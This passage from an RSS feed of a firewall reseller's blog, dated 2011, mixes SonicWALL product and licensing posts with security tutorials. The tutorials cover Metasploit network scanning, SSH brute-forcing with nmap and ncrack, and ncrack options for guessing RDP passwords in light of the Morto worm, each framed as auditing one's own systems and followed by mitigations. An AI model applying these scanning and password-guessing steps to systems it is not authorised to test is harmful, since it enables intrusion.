      <description><![CDATA[<p>For client-based secure remote access, SonicWALL offers both<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn"> SSL VPN</a> and <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client">IPSec VPN</a> connectivity options.</p>
<table id="product-attribute-specs-table" class="data-table" width="80%">
  <tr class="even">
    <th  >
      Client Name </th>
    <th >Type</th>
    <th  >Brief Description</th>
  </tr>
  <tr class="even">
    <td  valign="top"><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SonicWALL NetExtender</a></td>
    <td  valign="top"><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SSL VPN</a></td>
    <td  valign="top">Modern thin client connectivity</td>
  </tr>
  <tr class="even">
    <td  valign="top"><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client">SonicWALL Global VPN Client</a></p></td>
    <td  valign="top"><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client">IPsec VPN</a></p></td>
    <td  valign="top"><p>Enhanced traditional IPsec client-based VPN experience</p></td>
  </tr>
</table>
<h3><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SonicWALL NetExtender</a></h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/globalVPN.png" alt="" /></td>
    <td>The  <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SonicWALL NetExtender</a> is a <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SSL VPN</a> client that provides network level access to  resources, services and applications on the corporate network.<br>
The connectivity experience is virtually identical to that  of a traditional IPSec VPN client, but <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">NetExtender</a> does not require any manual  client installation. </td>
  </tr>
</table>
<p>  The client is transparently downloaded from the SSL VPN  portal and installed on the users' machines, either with ActiveX controls for  Internet Explorer users, with the XPCOM plugin for Firefox users or with Java  controls on Linux or Mac OS X systems for supported browsers. The NetExtender  client will create a connection profile recording the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SSL VPN</a> gateway address,  the Domain name and optionally the username and password.<br>
  NetExtender has broad platform(including mobile devices) and  operating systems support(Windows, Linux or Mac OS X).<br>
</p>
<h3><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client"> SonicWALL Global VPN Client
</a></h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/netextenderVPN.png" alt="" /></td>
    <td>The <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client">SonicWALL Global VPN Client</a> is an IPsec-based VPN client that  provides users with an enhanced traditional client-based VPN experience.<br>
    <p>It includes easy-to-follow wizards to help users install and  configure a VPN connection. The users enter the domain name or IP address of  the SonicWALL VPN gateway and the Global VPN Client configuration policy is  automatically downloaded.</p></td>
  </tr>
</table>

  <p>
The connection is robust as the VPN session reliability feature  allows the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client">Global VPN Client</a> to support redundant SonicWALL VPN gateways to  ensure mission-critical network access in the event the primary gateway fails.</p>
  <h3>
    SonicWALL VPN Clients Features</h3>
  
<table  id="product-attribute-specs-table" class="data-table">
  <tr class="even">
    <th  valign="top">      Feature </th>
    <th  valign="top"><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-utm-ssl-vpn">SonicWALL NetExtender</a></p></th>
    <th valign="top"><p><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-vpn-client">SonicWALL Global VPN Client</a></p></th>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>VPN Type</p></td>
    <td  valign="top"><p>SSL VPN client-based</p></td>
    <td valign="top"><p>IPsec VPN client-based</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>VPN Gateway Type</p></td>
    <td  valign="top"><p>VPN Firewall 1, Dedicated 2</p></td>
    <td valign="top"><p>VPN Firewall 1</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Access Type</p></td>
    <td  valign="top"><p>Network level</p></td>
    <td valign="top"><p>Network level</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Connectivity </p></td>
    <td  valign="top"><p>Anywhere</p></td>
    <td valign="top"><p>IPsec must be allowed</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>NAT Traversal</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Mobile Device Support</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>No</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Broad OS support</p></td>
    <td  valign="top"><p>Yes(Windows, Linux, Mac OS X)</p></td>
    <td valign="top"><p>No(Windows only)</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Easy-to-use</p></td>
    <td  valign="top"><p>Yes (+)</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Easy-to-manage</p></td>
    <td  valign="top"><p>Yes (+)</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Installation</p></td>
    <td  valign="top"><p>On-the-fly</p></td>
    <td valign="top"><p>Manual</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Auto-Launch</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Client Policy Provisioning </p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Two-Factor Authentication</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Client Certificate</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Client routes</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Full tunnel mode</p></td>
    <td  valign="top"><p>Yes</p></td>
    <td valign="top"><p>Yes</p></td>
  </tr>
  <tr class="odd">
    <td  valign="top"><p>Clean VPN</p></td>
    <td  valign="top"><p>Yes 3</p></td>
    <td valign="top"><p>Yes 3</p></td>
  </tr>
  <tr class="even">
    <td  valign="top"><p>Endpoint Type</p></td>
    <td  valign="top"><p>Managed and possibly unmanaged</p></td>
    <td valign="top"><p>Rather managed</p></td>
  </tr>
</table>
<div style=" font-size:9px; margin-left:30px">1: VPN Firewall: supported <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-tz-firewalls">TZ Series</a>, <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">NSA</a> or  <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">E-Class NSA Series.</a><br>
  2: Dedicated:<a href="http://www.firewalls.com/sonicwall/sra"> SRA series</a>.<br>
  3: Clean VPN: on the VPN Firewall appliances the Antivirus, IPS,  content filtering, etc. options must be active; the dedicated SSL VPN appliance  must be deployed along a SonicWALL UTM or NGFW.</div>
]]></description>
      <pubDate>Tue, 04 Oct 2011 18:00:01 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Now 4, 5 and 6 years subscription of Dynamic support is available]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/bundle-year-dynamic-support/</link>
      <description><![CDATA[<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/sonicwall_dynamic_support.jpg" alt="" /></td>
    <td> Good news, from now on Sonicwall will provide 4, 5 and 6 years Subscription of Dynamic and E-class support for NSA and E-class Appliances. <br>
  Usually in the 4th year, customers had to purchase new subscription, which costs bit higher than bundle subscription purchase. </td>
  </tr>
</table>
<p><strong>To save your money, you can just give us a call on 866.403.5305 and let us know how many years of subscriptiuon do you want. (this option is not available through normal published price list)</strong></p>
<p><strong>4, 5 and 6 years 24x7 support is available for the following models:</strong></p>
<div style=" margin-left:35px">
    <table cellspacing="0" cellpadding="0">
    
      <tr>
        <td >» SonicWALL    Dynamic Support 8x5 for the NSA 240 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support    24x7 for the NSA 240 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support 8x5    for the NSA 2400 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support    24x7 for the NSA 2400 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support 8x5    for the NSA 3500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support    24x7 for the NSA 3500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support 8x5    for the NSA 4500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL Dynamic Support    24x7 for the NSA 4500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL E-Class Support    24x7 for NSA E5500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL E-Class Support    24x7 for NSA E6500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL E-Class Support    24x7 for NSA E7500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL E-Class Support    24x7 for NSA E8500 (4, 5 &amp; 6 Years)</td>
      </tr>
      <tr>
        <td>» SonicWALL E-Class Support    24x7 for NSA E8510 (4, 5 &amp; 6 Years)</td>
      </tr>
    </table>
  </div>]]></description>
      <pubDate>Tue, 04 Oct 2011 04:24:58 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Protect Network Users from Botnet Servers]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall_firewall_bot_protection/</link>
      <description><![CDATA[<p>&quot;Bots&quot; are small applications that are installed on a users computer and run quietly in the background awaiting commands from a botnet control server. The botnet control server manages and sends instructions to bots all around the world. The bots can be instructed to perform tasks such as launching a denial of service attack on a website to gathering banking and credit card information.</p>
<h3> SonicWALL Can Help</h3>
<p>Built into the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-comprehensive-gateway-security-suite">SonicWALL CGSS</a> (<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-comprehensive-gateway-security-suite">Comprehensive Gateway Security Suite</a>) you can protect your network from 2 different angles. They are:</p>
<p>1) Block Connections to/from known botnet control servers - With a single click your SonicWALL will watch for and stop any attempts to connect with a botnet server. Further more, the built in reporting will tell you exactly which PC on the network has the bot install so you can get it cleaned up.</p>
<p>2) Block Connections to/from Countries - With this feature you can prevent connections to and from servers outside of your local country. This helps control what servers your network users can connect to and helps block botnet servers that may have yet to be discovered.</p>
<h2>How it's Done</h2>
<p>Watch this video on how you can easily implement this feature on your <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL firewall</a>.</p>
<p><iframe width="720" height="396" src="http://www.youtube.com/embed/JwRi2me2hSk?rel=0" frameborder="0" allowfullscreen></iframe></p>
<h3>Additional Resources:</h3>
<p><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL Firewalls</a><br>
<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-comprehensive-gateway-security-suite">SonicWALL CGSS</a> - Comprehensive Gateway Security Suite </p>
]]></description>
      <pubDate>Wed, 21 Sep 2011 17:30:53 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Prevent Users from Uploading Web-Based Email Attachments]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/block-email-attachment-web/</link>
      <description><![CDATA[<table><TR><TD><img src="http://static.firewalls.com/media/wysiwyg/firewalls/icon-videos.png" alt="" /></TD><TD>With more users moving towards using web-based email clients controlling what they can attach and send can be a full time job. Fortunately, you can use a SonicWALL UTM firewall appliance along with a SSL DPI upgrade to prevent users from sending attachments using any web-based email client.</TD></TR></TABLE>

<h3>Requirements for this video</h3>
<p>(1) <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl">SonicWALL Firewall</a> - TotalSecure Series</p>
<p>(1) <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl">SonicWALL SSL DPI upgrade</a> option</p>
<h3>Here is How it is Done:</h3>
<p>&nbsp;</p>
<iframe width="720" height="366" src="http://www.youtube.com/embed/cWCTqGegtkQ?rel=0" frameborder="0" allowfullscreen></iframe>]]></description>
      <pubDate>Tue, 20 Sep 2011 20:32:36 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Active Information Gathering with Metasploit’s Scanners]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/metasploit_scanner_stay_secure/</link>
      <description><![CDATA[<h3>Active information gathering</h3>
 <p> Information gathering is used by attackers or pen testers to gain information  about target systems.<br>
  Active information gathering is accomplished by interacting directly with the  targets to learn more about them. Interaction is done as carefully possible to  avoid detection(of the activity or intentions).</p>
 <h3>Tools</h3>
 <p> Nmap is one of the most popular scanners used for active  information gathering.<br>
   An alternative to it is Metasploit and its auxiliary modules, particularly its  scanners.<br>
   From ARP scans, SYN scans to various service scans(HTTP,  SQL, SMB, SSH, etc.) can be performed with Metasploit’s scanners.<br>
   You can see the available scanners within Metasploit’s console using the <strong>search auxiliary ^scanner</strong> command.</p>
 <h3> Putting to work Metasploit’s scanners</h3>
 <p> We will use the scanners to detect any live targets located on the same subnet  with us, to perform a port scan against these machines and to identify the  services running on the found open ports.</p>
 <h3>Metasploit ARP scanner</h3>
 <p> We can enumerate systems located on the same network as our machine by  performing an ARP scan.<br>
   We start by instructing Metasploit to use the ARP scan  module; to view a module’s option use the <strong>show  options</strong> command.<br>
   <img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_arp_scan_use.png" alt="" /><br>
   We can set the <strong>THREADS</strong> value to a higher number in order to improve the speed of scanning(or to a  lower one if we want to be quiet); type the <strong>run</strong> command and hit enter to perform the scan.<br>
   <img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_arp_scan_run.png" alt="" /><br>
   <h3>Metasploit port scanner</h3>
   Once we identified the target machines we will use the port scanner module to run  a SYN scan against these machines. For example we will search to see if a few  popular ports are open on one of the target systems.<br>
  <img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_port_scan_run.png" alt="" /><br>
 <h3>  Metasploit service identification</h3>
   After we found the open ports, we will proceed to identify the services running  on those ports.<br>
   To find out more about the service running on the TCP port 22 we can use the ssh_version  module.<br>
  <img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_ssh_scan_run.png" alt="" /> <br>
  <h3>Conclusion</h3>
   Metasploit’s auxiliary scanner modules are an excellent alternative to popular  scanners like nmap for the active information gathering process.</p>
]]></description>
      <pubDate>Tue, 13 Sep 2011 14:50:56 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SSH Brute Force Attacks]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/ssh_brute_force_attack/</link>
      <description><![CDATA[<p>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_ssh_login.png" align="left" alt="Description: ssh_login.png" /></td>
    <td>One  popular usage of SSH is to allow users to access a command shell on a remote  computer for administrative purposes.<br>
It&rsquo;s often used for the administration of Linux-based systems, routers or  firewalls. The latest version of SSH is 2; normally TCP port 22 is used by it.</td>
  </tr>
</table>

  In this article we will discuss how SSH brute force attacks  work, how we can test and defend our systems against such attacks.</p>
<h3> Issues with SSH</h3>
<p> Normally SSH provides encryption for data, public key authentication for the  server and password authentication for users(username and password are also encrypted  within the SSH session); public key authentication is also possible for users.</p>
<ul>
  <li>Although considered a bad practice, administrators  exposed SSH services to hostile networks(like the Internet),  allowing root login over SSH with password  based authentication.</li>
  <li>Using a weak password for the root account could  lead to a total system compromise as the root credentials can be determined  through brute force attacks.</li>
  <li></li>
</ul><h3>Anatomy of automated SSH brute force attacks</h3>
<p> SSH brute force attacks can be automated or targeted. Here is a typical example  of an automated attack.<br><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_anat.png" alt="Anatomy of automated SSH brute force attacks" />
  </p>
<ul>
  <li>Attackers scan for SSH daemons exposed to the  Internet.</li>
  <li>The scans can be done by bots; usually automated  scans target the regular SSH TCP 22 port.</li>
  <li>Assuming the TCP port 22 is found open, service  identification is attempted.</li>
  <li>SSH banners can expose info about the SSH  service(like OpenSSH version) and the underlying OS(like Debian Linux).</li>
  <li>Based on the information gathered attackers try  to discover valid username and password combinations through SSH brute force  attacks; these are not quite brute force attacks, rather they use weak  passwords dictionaries.</li>
  <li>A prime target will be the root account.</li>
  <li>If root login over SSH is allowed with a weak  password, attackers may end up in complete control of the exposed system.</li>
</ul>
<h3>Demonstrating a SSH brute force attack</h3>
<p> Auditing a SSH daemon exposed to a hostile network can be done using tools like  nmap and ncrack.<br>
  With nmap we scan for open SSH ports and  discover details about the services running on those ports.<br>
  With ncrack we attempt to perform a brute force attack against the discovered  SSH server.<br>
  Both tools are available on the latest BackTrack penetration  testing distribution which we will use it below.<br>
  <strong>nmap in action</strong></p>
<ul>
  <li>First we attempt to determine if TCP port 22 is  open on the target machine; we will use a nmap half-open or stealth scanning.</li>
</ul>
<p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_nmap_port.png" alt="nmap in action" /></p>
<ul>
  <li>Next we will perform a service scan to find out  if the SSH port is used by a SSH daemon; and if yes, to obtain more info about  the SSH daemon. From below we can spot that OpenSSH listens on the TCP port 22  and that the underlying OS might be Debian.</li>
</ul>
<p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_nmap_srv.png" alt="nmap in action" />
</p>
<ul>
  <li>We can use nmap to obtain more info, but for the  moment let&rsquo;s pretend we are happy with what we know.</li>
</ul>
<h3><strong>ncrack in action</strong></h3>
<ul>
  <li>ncrack comes with its own list of password  dictionaries; the &lsquo;default.pwd&rsquo; dictionary is used unless we specify another  one. We will attempt to determine if the user root is allowed to login over SSH  with a weak password; we will instruct ncrack to quit trying(-f option) after it  founds the root password, the -d option specifies the level of debugging(7  below).</li>
</ul>
<p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_ncrack.png" alt="ncrack in action" /><br>
  <div style="background-color:#CCC; padding:5px">Note that SSH does not allow the client to  change the username in the same connection and that a SSH server will  disconnect a client after a number of wrong passwords specified in that  connection.<br>
  ncrack tries to determine the maximum number of wrong passwords attempts and  tweaks the settings appropriately.<br>
You can balance yourself the cracking process; either for speed or for stealth(control  the number of parallel connections, authentication attempts per connection and delay  time between each connection initiation).</div></p>
<h3> Mitigations against SSH brute force attacks</h3>
<p> There are a couple of mitigations against SSH brute force attacks.</p>
<ul>
  <li>One of the most efficient mitigation is to not  expose the SSH daemon to hostile networks; use VPN to access SSH. For example  with a SSL VPN is easy to securely publish SSH servers for your users.</li>
  <li>If you need to leave directly exposed to the  Internet any SSH server use public key authentication for user authentication  and disable regular password authentication.</li>
</ul>
<p>If public key authentication for  users is not possible, attempt to mitigate brute force attacks through a  combination of methods by:</p>
<ul>
  <li>using strong passwords and not allowing root  login over SSH(it&rsquo;s better to have a separate account for regular use and to  sudo to root when needed). Changing the default SSH port might help in some  cases of automated attacks when only the default TCP port is probed.</li>
  <li>using a firewall/IPS in front of the SSH server  to limit the number of TCP simultaneous connections a client can open against  your SSH server and to raise an alert when the threshold is reached.</li>
  <li>detecting with an IPS signature attempts of SSH  credential guessing attacks(note that since the username and password are  encrypted within the SSH session, it is impossible to determine if actually password  guessing attacks are occurring, rather an excessive number of SSH connections  made to an SSH server within a specified timeframe will be detected by the IPS).</li>
</ul>
<h3>Summary</h3>
  SSH brute force attacks are nothing new. Still some administrators expose SSH  servers to the Internet allowing root login over SSH with weak passwords. SSH  brute force attacks target such servers in order to expose the weak credentials  and allow attackers to take control of the systems.<br>
  In order to avoid such mistakes make sure you audit any servers exposed to the  Internet and if SSH connections are allowed from the Internet to any of them  take appropriate measures to protect against SSH brute force attacks.</p>
]]></description>
      <pubDate>Wed, 07 Sep 2011 13:03:35 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[The Morto worm targets RDP servers with weak passwords]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/morto_worm/</link>
      <description><![CDATA[<h3>Background</h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_rdp.png" alt="" /></td>
    <td>Yesterday  Threatpost reported a story [1] about a new worm called Morto targeting  Microsoft Remote Desktop services (RDP) that is making waves on the Internet.</td>
  </tr>
</table>

Earlier, huge spikes in RDP TCP port 3389 scans were reported by the SANS Storm Center.
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_morto.png" alt="" /></td>
    <td>
For  the moment, according to Microsoft [2], the worm is using a list of passwords  for the default <strong>administrator</strong> user  name to attempt to gain access to a system.<br>
On the compromised machine a couple of files are installed. Then the worm will  cycle through the IP addresses on the compromised computer's subnet attempting  to connect with RDP to other local RDP servers as described above.</td>
  </tr>
</table>
<p>Some feared the attack vector was an exploitable  vulnerability of Microsoft's RDP. Right now this not seems to be the case. Weak  passwords are the culprit.<br>
  It's not clear what authentication version Morto can use, if  it supports Network Level Authentication or not.</p>
<h3><br>
  Vulnerability scan</h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_scan.png" alt="" /></td>
    <td>The <strong>ncrack</strong> tool[3] can be used among  others to test your environment.<br>
To use the list of passwords found on MS page [2], simply create an empty .txt  file and copy and paste within this file the passwords from MS' page and feed  this file into ncrack with the <strong>-P</strong> option.</td>
  </tr>
</table>
<p>  Or use the <strong>--pass</strong> option to specify  these passwords comma separated.<br>
  A couple of ncrack options:</p>
<ul>
  <li><strong>--user</strong> option: used to specify your own usernames directly in the command-line as a  comma-separated list.</li>
  <li><strong>--pass</strong> option: used to specify your own passwords directly in the command-line as a  comma-separated list.</li>
  <li><strong>-P</strong> option: used to specify the password file; defaults to default.pwd.</li>
  <li><strong>-U</strong> option: used to specify the usernames file.</li>
  <li><strong>-f</strong> option: specifies to quit cracking after one found credential.</li>
  <li><strong>-d7</strong> option: sets the debugging level to 7; up to 10 is meaningful.</li>
  <li><strong>-v</strong> or  -<strong>vv</strong> option: sets the verbosity  level.</li>
  <li><strong>CL</strong> option: specifies the connection limit; 1 must be used against Windows XP  machines.</li>
</ul>
<p>Example of command against a Windows Vista machine using the  list of passwords from Microsoft's page[2].<br>
 <img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_vista.png" alt="" /><br>
<div style="background-color:#CCC"> <strong>On Windows ncrack may require the Microsoft  Visual C++ Redistributable Packages 2008 and 2010 versions to be installed.
  </p>
 </strong>
   <p><strong> It is shipped with BackTrack.</strong></p>
<p><strong>Version 0.4Alpha is the latest version.</strong></p>
<p><strong>ncrack does not support Network Level Authentication; so does  not works when the Allow connections only from computers running Remote Desktop with Network Level  Authentication is used.</strong></p>
<p><strong> Works better against Windows XP and 2003 machines; for Windows Vista or 7  machines the users may need to be logged off. </strong></p></div>
<h3>Mitigations</h3>
  
 <p>
   This  worm right now takes advantage of weak password.<br>
   So:
</p>
 <table>
   <tr>
     <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_mitig.png" alt="" align="left" /></td>
     <td><ul>
       <li>Don't use weak passwords on your RDP servers;  use GPOs to prevent this.</li>
       <li>Don't leave directly exposed to the Internet any  RDP servers; use VPN to access RDP. For example with a SSL VPN is easy to  securely publish RDP servers for your users.</li>
       <li>A possible DoS condition exists if you exposed  your RDP servers directly to the Internet; use an IPS or a firewall with  anti-DoS capabilities in front of them to limit the incoming number of concurrent  TCP connections.</li>
     </ul></td>
   </tr>
 </table>

<h3><strong><u>References</u></strong></h3>
<p>  [1] New Worm Morto Using RDP to Infect Windows PCs<br>
  https://threatpost.com/en_us/blogs/new-worm-morto-using-rdp-infect-windows-pcs-082811<br>
  [2] Worm:Win32/Morto.A<br>
  http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FMorto.<br>
  [3] ncrack<br>
  http://nmap.org/ncrack/<br>
  http://nmap.org/ncrack/man.html<br>
</p>
]]></description>
      <pubDate>Mon, 29 Aug 2011 19:29:39 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL TotalSecure CGSS License - How to Buy and Renew]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall-cgss-totalsecure/</link>
      <description><![CDATA[<TABLE BORDER="0" WIDTH="100%"><TR><TD align="center" WIDTH="175">

 <img src="http://static.firewalls.com/skin/frontend/default/firewalls/images/snwl_category_Comprehensive-GSS_thumb.jpg" ALT="SonicWALL Comprehensive Gateway Security Suite / TotalSecure" title="SonicWALL Comprehensive Gateway Security Suite / TotalSecure Renewal"></TD><TD ALIGN="left" VALIGN="top">The SonicWALL TotalSecure firewall models include the CGSS (comprehensive gateway security suite) subscription.  When your subscription expires, you will need to purchase a new CGSS subscription.  This article will walk you through everything you need to know to successfully to renew your service.

<TABLE BORDER="0" WIDTH="100%">
	<TR>
		<TD WIDTH="50%" ALIGN="left" valign="top">
		  <span style="margin-left:-3px; font-size:14px"  ><b>Protection Included with the License:</b></span>
		  <P style="margin-left:8px">»   				  				 Prevents viruses, spyware &amp; intrusions<br />
		    »   ViewPoint reporting of user activities<br />
		    »   24x7 technical support<br>
		    »   Extend hardware warranty<br>
	      » Content filter user access to the Internet</TD>
		</TR>
</TABLE>
</TD></TR></TABLE>

<h3>&nbsp;</h3>
<h2>How to Successfully Buy & Renew Your CGSS Service</h2>
<table>
  <tr>
    <td><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_step_1.jpg"  /></td>
    <td><h3>Step 1: How to Install Your License</h3>
    <p>It is important that  you know how to properly activate your subscription. We have created a <a onClick="javascript: pageTracker._trackPageview('/track/license how to');" rel="floatbox.ajax" rev="width:835 height:510" href="http://www.youtube.com/embed/0QKSixeYiXM?rel=0&amp;hd=1" target="_blank">handy video that will walk you through that process</a>.</p></td>
  </tr>
  <tr>
    <td><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/blog_step_2.jpg"  /></td>
    <td><h3>Step 2: Select Your License</h3>
    <p>Below, you will find a list SonicWALL models that support the CGSS service. Simply select the model that you own. You will then be presented with the option to buy either the 1,2 or 3 year license.</p></td>
  </tr>
</table>
<br>

<h3>&nbsp;</h3>
<h2>Select the Firewall Model You Have:</h2>
<table class="data-table" id="product-attribute-specs-table">
  <tr class="odd">
    <td colspan="4" STYLE="background-color: rgb(246, 246, 246); padding:6px" ><h4> SonicWALL TZ Series Security Suite</h4></td>
  </tr>
  <tr class="even">
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz-100-licenses?sonicwallservices_subscription=203">SonicWALL TZ 100</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz-100-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_100.jpg" alt="tz 100 cgss" width="101" height="100" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz150-licenses?sonicwallservices_subscription=203">SonicWALL TZ 150</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz150-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_150.jpg" alt="tz 150 cgss" width="101" height="100" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz170-licenses?sonicwallservices_subscription=203">SonicWALL TZ 170</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz170-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_170.jpg" alt="tz 170 cgss" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz180-software-and-subscriptions?sonicwallservices_subscription=203">SonicWALL TZ 180</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz180-software-and-subscriptions?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_180.jpg" alt="tz 180 cgss" /></a></div></td>
  </tr>
  <tr class="even">
